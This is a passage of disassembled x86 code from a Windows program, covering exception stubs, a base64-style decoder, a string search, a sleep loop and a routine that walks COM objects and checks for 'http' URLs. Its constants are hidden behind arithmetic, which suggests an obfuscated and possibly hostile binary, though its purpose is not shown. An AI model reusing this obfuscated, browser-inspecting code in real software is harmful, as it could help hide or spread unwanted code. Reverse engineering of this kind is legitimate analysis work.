_text segment para public 'CODE' use32
assume cs:_text
;org 43A000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_43A006: ; DATA XREF: sub_43A026+A�o
xor eax, eax
inc eax
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
jz short locret_43A025
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_43A025: ; CODE XREF: .text:0043A014�j
retn
; =============== S U B R O U T I N E =======================================
sub_43A026 proc near ; CODE XREF: .text:0043A14E�p
; .text:0043A17C�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset loc_43A006
push large dword ptr fs:0
mov large fs:0, esp
loc_43A043: ; CODE XREF: sub_43A026+44�j
; sub_43A026+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43A072
cmp esi, [esp+1Ch+arg_4]
jz short loc_43A072
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43A043
call dword ptr [ebx+esi*4+8]
jmp short loc_43A043
; ---------------------------------------------------------------------------
loc_43A072: ; CODE XREF: sub_43A026+2A�j
; sub_43A026+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43A026 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A080 proc near ; CODE XREF: .text:0043A141�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_43A098
push [ebp+arg_0]
call sub_444FD0
loc_43A098: ; DATA XREF: sub_43A080+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43A080 endp
; ---------------------------------------------------------------------------
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_43A175
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43A0D3: ; CODE XREF: .text:0043A16C�j
cmp esi, 0FFFFFFFFh
jz loc_43A184
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43A163
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov dword_44C034, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov dword_44C038, eax
mov eax, [edx+4]
mov dword_44C03C, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_44C040
mov esi, dword_44C038
rep movsd
lea edi, dword_44C040
mov dword_44C038, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43A163
js short loc_43A171
mov edi, [ebx+8]
push ebx
call sub_43A080
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43A026
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43A163: ; CODE XREF: .text:0043A0E4�j
; .text:0043A139�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43A0D3
; ---------------------------------------------------------------------------
loc_43A171: ; CODE XREF: .text:0043A13B�j
xor eax, eax
jmp short loc_43A18E
; ---------------------------------------------------------------------------
loc_43A175: ; CODE XREF: .text:0043A0B8�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43A026
add esp, 0Ch
loc_43A184: ; CODE XREF: .text:0043A0D6�j
push 0Bh
call sub_445018
add esp, 4
loc_43A18E: ; CODE XREF: .text:0043A173�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_43A1A7
call sub_43A1C3
loc_43A1A7: ; CODE XREF: .text:0043A1A0�j
call sub_444F5B
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, off_44C000
call eax ; sub_444F30
pop edi
pop esi
pop ebx
leave
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A1C3 proc near ; CODE XREF: .text:0043A1A2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_444FE8
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_444FE8
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_444FE8
mov [ebp+var_C], eax
push (offset aWr+2)
push [ebp+var_8]
call sub_444FDC
mov dword_44C008, eax
push offset aWr ; "wr"
push [ebp+var_4]
call sub_444FDC
mov dword_44C004, eax
push offset aWr ; "wr"
push [ebp+var_C]
call sub_444FDC
add esp, 30h
mov dword_44C00C, eax
mov edi, dword_44C004
or edi, edi
jz short loc_43A23C
push 0
push edi
call sub_445024
add esp, 8
loc_43A23C: ; CODE XREF: sub_43A1C3+6C�j
mov edi, dword_44C00C
or edi, edi
jz short loc_43A256
push 0
push edi
call sub_445024
add esp, 8
call sub_43A25C
loc_43A256: ; CODE XREF: sub_43A1C3+81�j
pop edi
leave
retn
sub_43A1C3 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A25C proc near ; CODE XREF: sub_43A1C3+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_444FC4
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_43A294
; ---------------------------------------------------------------------------
loc_43A278: ; CODE XREF: sub_43A25C+3B�j
cmp byte ptr [ebx], 3Dh
jz short loc_43A280
inc [ebp+var_C]
loc_43A280: ; CODE XREF: sub_43A25C+1F�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_43A294: ; CODE XREF: sub_43A25C+1A�j
cmp byte ptr [ebx], 0
jnz short loc_43A278
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_44500C
pop ecx
mov [ebp+var_8], eax
mov dword_44C010, eax
cmp [ebp+var_8], 0
jnz short loc_43A2C2
xor eax, eax
jmp short loc_43A31F
; ---------------------------------------------------------------------------
loc_43A2C2: ; CODE XREF: sub_43A25C+60�j
mov ebx, [ebp+var_10]
jmp short loc_43A30C
; ---------------------------------------------------------------------------
loc_43A2C7: ; CODE XREF: sub_43A25C+B3�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr [ebx], 3Dh
jz short loc_43A306
push [ebp+var_4]
call sub_44500C
pop ecx
mov esi, [ebp+var_8]
mov [esi], eax
or eax, eax
jnz short loc_43A2F4
jmp short loc_43A31F
; ---------------------------------------------------------------------------
loc_43A2F4: ; CODE XREF: sub_43A25C+94�j
push ebx
mov edi, [ebp+var_8]
push dword ptr [edi]
call sub_445030
add esp, 8
add [ebp+var_8], 4
loc_43A306: ; CODE XREF: sub_43A25C+82�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_43A30C: ; CODE XREF: sub_43A25C+69�j
cmp byte ptr [ebx], 0
jnz short loc_43A2C7
mov edx, [ebp+var_8]
mov dword ptr [edx], 0
mov eax, 1
loc_43A31F: ; CODE XREF: sub_43A25C+64�j
; sub_43A25C+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_43A25C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A324 proc near ; CODE XREF: sub_43E2C0+C1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 8000h
movsx eax, word_44C1F0
add eax, dword_44C284
sub eax, 0Ch
push eax
push [ebp+arg_0]
call ds:dword_44A634 ; VirtualFree
pop ebp
retn
sub_43A324 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A348 proc near ; CODE XREF: sub_43CF47+1A4�p
; sub_43CF47+259�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
movsx eax, word_44C1FC
add eax, dword_44C108
sub eax, 0Bh
mov [ebp+var_8], eax
mov [ebp+var_C], eax
mov esi, eax
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_8]
add eax, ebx
mov [ebp+var_4], eax
mov edi, [ebp+arg_0]
jmp loc_43A486
; ---------------------------------------------------------------------------
loc_43A37C: ; CODE XREF: sub_43A348+146�j
movsx edx, byte ptr [edi]
shl edx, 2
mov esi, dword_44C3B8[edx]
mov eax, dword_44C090
movsx edx, word_44C0E0
add eax, edx
sub eax, 3
neg eax
cmp esi, eax
jz loc_43A485
mov eax, [ebp+var_8]
or eax, eax
jl loc_43A482
cmp eax, 3
jg loc_43A482
jmp off_44C7B8[eax*4]
loc_43A3BF: ; DATA XREF: .data:off_44C7B8�o
inc [ebp+var_8]
jmp loc_43A482
; ---------------------------------------------------------------------------
loc_43A3C7: ; CODE XREF: sub_43A348+70�j
; DATA XREF: .data:0044C7BC�o
mov edx, [ebp+var_C]
mov ecx, dword_44C158
add ecx, dword_44C0A8
sub ecx, 0Dh
mov eax, edx
shl eax, cl
mov [ebp+var_18], eax
mov edx, esi
and edx, 30h
mov ecx, dword_44C278
movsx eax, word_44C170
add ecx, eax
mov eax, edx
sar eax, cl
mov edx, [ebp+var_18]
or edx, eax
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_43A482
; ---------------------------------------------------------------------------
loc_43A40D: ; CODE XREF: sub_43A348+70�j
; DATA XREF: .data:0044C7C0�o
mov edx, [ebp+var_C]
and edx, 0Fh
movsx ecx, word_44C1A4
sub ecx, 3
mov eax, edx
shl eax, cl
mov [ebp+var_1C], eax
mov edx, esi
and edx, 3Ch
mov ecx, dword_44C134
sub ecx, 6
mov eax, edx
sar eax, cl
mov edx, [ebp+var_1C]
or edx, eax
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_43A482
; ---------------------------------------------------------------------------
loc_43A44B: ; CODE XREF: sub_43A348+70�j
; DATA XREF: .data:0044C7C4�o
mov edx, [ebp+var_C]
and edx, 3
movsx ecx, word_44C208
inc ecx
mov eax, edx
shl eax, cl
mov edx, eax
or edx, esi
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
movsx eax, word_44C144
movsx edx, word_44C1DC
add eax, edx
sub eax, 7
mov [ebp+var_8], eax
loc_43A482: ; CODE XREF: sub_43A348+61�j
; sub_43A348+6A�j ...
mov [ebp+var_C], esi
loc_43A485: ; CODE XREF: sub_43A348+56�j
inc edi
loc_43A486: ; CODE XREF: sub_43A348+2F�j
cmp byte ptr [edi], 0
jz short loc_43A494
cmp ebx, [ebp+var_4]
jb loc_43A37C
loc_43A494: ; CODE XREF: sub_43A348+141�j
cmp byte ptr [edi], 0
jnz short loc_43A4A0
mov eax, ebx
sub eax, [ebp+arg_4]
jmp short loc_43A4B0
; ---------------------------------------------------------------------------
loc_43A4A0: ; CODE XREF: sub_43A348+14F�j
mov eax, dword_44C0E4
add eax, dword_44C090
sub eax, 0Bh
neg eax
loc_43A4B0: ; CODE XREF: sub_43A348+156�j
pop edi
pop esi
pop ebx
leave
retn
sub_43A348 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A4B5 proc near ; CODE XREF: sub_43A58C+68A�p
; sub_43B3B1+EF�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_43A4CA: ; CODE XREF: sub_43A4B5+1A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43A4CA
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [eax]
or eax, 0FFFFFFFFh
loc_43A4DC: ; CODE XREF: sub_43A4B5+2C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43A4DC
mov esi, eax
movsx eax, word_44C118
sub eax, 3
mov [ebp+var_4], eax
jmp short loc_43A54D
; ---------------------------------------------------------------------------
loc_43A4F4: ; CODE XREF: sub_43A4B5+9E�j
mov eax, dword_44C184
movsx edx, word_44C100
mov ebx, eax
add ebx, edx
sub ebx, 5
mov eax, dword_44C1C8
mov edi, eax
add edi, dword_44C13C
sub edi, 3
jmp short loc_43A546
; ---------------------------------------------------------------------------
loc_43A519: ; CODE XREF: sub_43A4B5+93�j
mov eax, [ebp+var_4]
add eax, edi
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+edi]
cmp eax, edx
jnz short loc_43A54A
inc ebx
cmp ebx, esi
jnz short loc_43A545
inc [ebp+var_8]
mov eax, [ebp+arg_8]
cmp [ebp+var_8], eax
jnz short loc_43A545
mov eax, [ebp+var_4]
jmp short loc_43A55A
; ---------------------------------------------------------------------------
loc_43A545: ; CODE XREF: sub_43A4B5+7E�j
; sub_43A4B5+89�j
inc edi
loc_43A546: ; CODE XREF: sub_43A4B5+62�j
cmp edi, esi
jb short loc_43A519
loc_43A54A: ; CODE XREF: sub_43A4B5+79�j
inc [ebp+var_4]
loc_43A54D: ; CODE XREF: sub_43A4B5+3D�j
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb short loc_43A4F4
mov eax, 0FFFFh
loc_43A55A: ; CODE XREF: sub_43A4B5+8E�j
pop edi
pop esi
pop ebx
leave
retn
sub_43A4B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43A55F proc near ; DATA XREF: sub_43BB7B+145�o
push ebp
mov ebp, esp
loc_43A562: ; CODE XREF: sub_43A55F+27�j
call sub_43E073
mov eax, dword_44C18C
add eax, 2
mov edx, dword_44C280
add edx, 0EA5Ch
imul eax, edx
push eax
call ds:dword_44B630
pop ecx
jmp short loc_43A562
sub_43A55F endp
; ---------------------------------------------------------------------------
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A58C proc near ; CODE XREF: sub_442EE8+29�p
var_71F10 = dword ptr -71F10h
var_71F0C = dword ptr -71F0Ch
var_71F07 = byte ptr -71F07h
var_70F08 = word ptr -70F08h
var_70F00 = dword ptr -70F00h
var_70EF9 = byte ptr -70EF9h
var_70EF8 = dword ptr -70EF8h
var_70EF4 = dword ptr -70EF4h
var_70EEF = byte ptr -70EEFh
var_60EF0 = word ptr -60EF0h
var_60EE8 = dword ptr -60EE8h
var_60EDD = byte ptr -60EDDh
var_60EDC = dword ptr -60EDCh
var_60ED8 = dword ptr -60ED8h
var_60ED4 = dword ptr -60ED4h
var_60ED0 = word ptr -60ED0h
var_60EC8 = dword ptr -60EC8h
var_60EC0 = dword ptr -60EC0h
var_60EBC = dword ptr -60EBCh
var_60EB8 = dword ptr -60EB8h
var_60EB4 = dword ptr -60EB4h
var_60EB0 = dword ptr -60EB0h
var_60EAC = dword ptr -60EACh
var_60EA8 = dword ptr -60EA8h
var_60EA4 = dword ptr -60EA4h
var_60E9F = byte ptr -60E9Fh
var_50E9D = byte ptr -50E9Dh
var_50E9B = byte ptr -50E9Bh
var_40EB8 = byte ptr -40EB8h
var_40EB0 = dword ptr -40EB0h
var_40EA8 = word ptr -40EA8h
var_40EA0 = dword ptr -40EA0h
var_40E9C = dword ptr -40E9Ch
var_40E98 = dword ptr -40E98h
var_40E94 = byte ptr -40E94h
var_40E90 = dword ptr -40E90h
var_40E8C = dword ptr -40E8Ch
var_40E88 = dword ptr -40E88h
var_40E84 = dword ptr -40E84h
var_40E80 = byte ptr -40E80h
var_40E78 = dword ptr -40E78h
var_40E70 = dword ptr -40E70h
var_40E6C = dword ptr -40E6Ch
var_40E68 = dword ptr -40E68h
var_40E64 = dword ptr -40E64h
var_40E60 = dword ptr -40E60h
var_40E5C = dword ptr -40E5Ch
var_40E57 = byte ptr -40E57h
var_40E56 = byte ptr -40E56h
var_40E55 = byte ptr -40E55h
var_40E54 = byte ptr -40E54h
var_30E58 = dword ptr -30E58h
var_30E54 = dword ptr -30E54h
var_30E50 = dword ptr -30E50h
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30D40 = byte ptr -30D40h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 71F10h
call sub_444F6C
push ebx
push esi
push edi
lea eax, [ebp+var_40E80]
push eax
call ds:dword_446038
lea eax, [ebp+var_40E94]
push eax
lea eax, [ebp+var_40E80]
push eax
push 9
movsx eax, word_44C16C
movsx edx, word_44C180
add eax, edx
sub eax, 5
push eax
push [ebp+arg_0]
call ds:dword_449254
mov ebx, eax
movsx eax, word_44C0C0
movsx edx, word_44C1B4
add eax, edx
sub eax, 6
cmp ebx, eax
jnz loc_43B355
mov eax, [ebp+var_40E78]
mov [ebp+var_40E64], eax
and [ebp+var_40E60], 0
lea eax, [ebp+var_40E60]
push eax
push offset dword_44DAD8
mov eax, [ebp+var_40E64]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44C26C
sub eax, 9
cmp ebx, eax
jnz loc_43B355
lea eax, [ebp+var_40E84]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
mov eax, dword_44C224
sub eax, 5
cmp ebx, eax
jnz loc_43B349
lea eax, [ebp+var_40E57]
push eax
push [ebp+var_40E84]
call sub_43E434
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_40E98], edi
push [ebp+var_40E84]
call ds:dword_44BBA0
cmp [ebp+var_40E57], 68h
jnz short loc_43A6A7
cmp [ebp+var_40E56], 74h
jnz short loc_43A6A7
cmp [ebp+var_40E55], 74h
jnz short loc_43A6A7
cmp [ebp+var_40E54], 70h
jz short loc_43A6AC
loc_43A6A7: ; CODE XREF: sub_43A58C+FE�j
; sub_43A58C+107�j ...
jmp loc_43B349
; ---------------------------------------------------------------------------
loc_43A6AC: ; CODE XREF: sub_43A58C+119�j
lea eax, [ebp+var_30E4C]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
mov eax, dword_44C204
add eax, dword_44C0DC
sub eax, 4
cmp ebx, eax
jz short loc_43A6DD
and [ebp+var_30E4C], 0
loc_43A6DD: ; CODE XREF: sub_43A58C+148�j
lea eax, [ebp+var_40E68]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
mov eax, dword_44C28C
add eax, dword_44C274
sub eax, 7
cmp ebx, eax
jnz loc_43B349
lea eax, [ebp+var_40E6C]
push eax
push offset dword_44DA58
mov eax, [ebp+var_40E68]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44C268
sub eax, 4
cmp ebx, eax
jnz loc_43B33D
lea eax, [ebp+var_40E70]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
mov eax, dword_44C204
dec eax
cmp ebx, eax
jnz loc_43B331
lea eax, [ebp+var_40E90]
push eax
mov eax, [ebp+var_40E70]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
movsx eax, word_44C170
sub eax, 2
cmp ebx, eax
jnz loc_43B325
mov eax, dword_44C128
sub eax, 8
neg eax
mov [ebp+var_40E5C], eax
push offset dword_44D9A0
call sub_441767
push eax
call ds:dword_446044
mov [ebp+var_30E44], eax
push offset dword_44D990
call sub_441767
add esp, 8
push eax
call ds:dword_446044
mov [ebp+var_30E48], eax
lea eax, [ebp+var_40E57]
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_444F8C
loc_43A7D4: ; CODE XREF: sub_43A58C+D6D�j
and [ebp+var_40E88], 0
and [ebp+var_40E8C], 0
mov eax, dword_44C194
sub eax, 8
neg eax
cmp [ebp+var_40E5C], eax
jnz short loc_43A83F
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, dword_44C1D0
add eax, dword_44C284
sub eax, 10h
cmp ebx, eax
jnz loc_43B2E7
push offset byte_44D981
call sub_43E507
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_446020
add esp, 0Ch
jmp loc_43A947
; ---------------------------------------------------------------------------
loc_43A83F: ; CODE XREF: sub_43A58C+266�j
mov [ebp+var_40EA8], 17h
mov eax, [ebp+var_40E5C]
mov [ebp+var_40EA0], eax
lea eax, [ebp+var_40EB8]
push eax
lea eax, [ebp+var_40EA8]
push eax
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_40E88]
push eax
push offset dword_44DAA8
push [ebp+var_40EB0]
mov edi, [ebp+var_40EB0]
mov edi, [edi]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44C1E8
dec eax
cmp ebx, eax
jnz loc_43B2E7
lea eax, [ebp+var_40E8C]
push eax
mov eax, [ebp+var_40E88]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
mov eax, dword_44C0B4
sub eax, 8
cmp ebx, eax
jz short loc_43A8D4
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_43B2E7
; ---------------------------------------------------------------------------
loc_43A8D4: ; CODE XREF: sub_43A58C+335�j
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E8C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, dword_44C21C
sub eax, 8
cmp ebx, eax
jz short loc_43A912
mov eax, [ebp+var_40E8C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_43B2E7
; ---------------------------------------------------------------------------
loc_43A912: ; CODE XREF: sub_43A58C+367�j
push offset word_44D972
call sub_43E507
push [ebp+var_40E5C]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_44B634
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_446020
add esp, 18h
loc_43A947: ; CODE XREF: sub_43A58C+2AE�j
lea eax, [ebp+var_30E58]
push eax
mov eax, [ebp+var_30E54]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, dword_44C268
sub eax, 4
cmp ebx, eax
jnz loc_43B2E7
movsx eax, word_44C240
movsx edx, word_44C0CC
add eax, edx
sub eax, 9
mov [ebp+var_30E50], eax
jmp loc_43B2D5
; ---------------------------------------------------------------------------
loc_43A98A: ; CODE XREF: sub_43A58C+D55�j
mov [ebp+var_60ED0], 2
mov eax, [ebp+var_30E50]
mov [ebp+var_60EC8], eax
movsx eax, word_44C0C0
mov edx, dword_44C14C
sub edx, 6
mov [ebp+eax+var_50E9D], dl
lea eax, [ebp+var_60EC0]
push eax
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_30E54]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
movsx eax, word_44C180
sub eax, 4
cmp ebx, eax
jnz loc_43B2CF
push offset dword_44D964
call sub_43E507
push [ebp+var_30E50]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_44B634
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_446020
add esp, 18h
and [ebp+var_60ED4], 0
lea eax, [ebp+var_60ED4]
push eax
push offset dword_44DA78
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44C224
sub eax, 5
cmp ebx, eax
jnz loc_43AF54
lea eax, [ebp+var_60ED8]
push eax
mov eax, [ebp+var_60ED4]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
cmp ebx, dword_44C138
jnz loc_43AF48
lea eax, [ebp+var_60E9F]
push eax
push [ebp+var_60ED8]
call sub_43E434
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_60EB8], edi
push [ebp+var_60ED8]
call ds:dword_44BBA0
movsx eax, word_44C230
sub eax, 6
mov [ebp+var_40E9C], eax
jmp short loc_43AB17
; ---------------------------------------------------------------------------
loc_43AACB: ; CODE XREF: sub_43A58C+597�j
mov eax, [ebp+var_40E9C]
movsx eax, [ebp+eax+var_60E9F]
movsx edx, word_44C104
add edx, 5
cmp eax, edx
jz short loc_43AAF5
movsx edx, word_44C130
add edx, 7
cmp eax, edx
jnz short loc_43AB11
loc_43AAF5: ; CODE XREF: sub_43A58C+559�j
mov eax, [ebp+var_40E9C]
mov edx, dword_44C25C
add edx, dword_44C1D8
sub edx, 11h
mov [ebp+eax+var_60E9F], dl
loc_43AB11: ; CODE XREF: sub_43A58C+567�j
inc [ebp+var_40E9C]
loc_43AB17: ; CODE XREF: sub_43A58C+53D�j
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb short loc_43AACB
lea eax, [ebp+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_444F8C
mov eax, dword_44C148
sub eax, 2
mov [ebp+var_40E9C], eax
loc_43AB46: ; CODE XREF: sub_43A58C+70D�j
mov eax, [ebp+var_40E9C]
lea ecx, [ebp+eax+var_60E9F]
or eax, 0FFFFFFFFh
loc_43AB56: ; CODE XREF: sub_43A58C+5CF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43AB56
mov [ebp+var_60EA8], eax
mov edx, dword_44C184
add edx, dword_44C188
sub edx, 2
cmp eax, edx
jz short loc_43AB8E
movsx edx, word_44C130
mov ecx, dword_44C13C
lea edx, [edx+ecx+0C2h]
cmp eax, edx
jbe short loc_43AB93
loc_43AB8E: ; CODE XREF: sub_43A58C+5E8�j
jmp loc_43AC6C
; ---------------------------------------------------------------------------
loc_43AB93: ; CODE XREF: sub_43A58C+600�j
mov eax, dword_44C1B0
sub eax, 7
mov [ebp+var_60EA4], eax
jmp short loc_43ABD3
; ---------------------------------------------------------------------------
loc_43ABA3: ; CODE XREF: sub_43A58C+653�j
mov eax, [ebp+var_40E9C]
add eax, [ebp+var_60EA4]
movsx eax, [ebp+eax+var_60E9F]
mov edx, dword_44C13C
add edx, 17h
movsx ecx, word_44C144
add edx, ecx
cmp eax, edx
jnz short loc_43ABE1
inc [ebp+var_60EA4]
loc_43ABD3: ; CODE XREF: sub_43A58C+615�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jb short loc_43ABA3
loc_43ABE1: ; CODE XREF: sub_43A58C+63F�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jz short loc_43AC6C
mov eax, dword_44C1A8
movsx edx, word_44C218
add eax, edx
sub eax, 6
push eax
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_43A4B5
add esp, 0Ch
mov [ebp+var_60EDC], eax
mov eax, dword_44C154
add eax, 0FFF8h
cmp [ebp+var_60EDC], eax
jnz short loc_43AC6C
push offset byte_44D95F
call sub_43E507
push eax
lea edi, [ebp+var_50E9B]
push edi
call ds:dword_446020
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call ds:dword_446020
add esp, 14h
loc_43AC6C: ; CODE XREF: sub_43A58C:loc_43AB8E�j
; sub_43A58C+661�j ...
mov eax, [ebp+var_60EA8]
movsx edx, word_44C1E0
movsx ecx, word_44C1C0
add edx, ecx
sub edx, 6
add eax, edx
add [ebp+var_40E9C], eax
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb loc_43AB46
mov eax, dword_44C28C
sub eax, 6
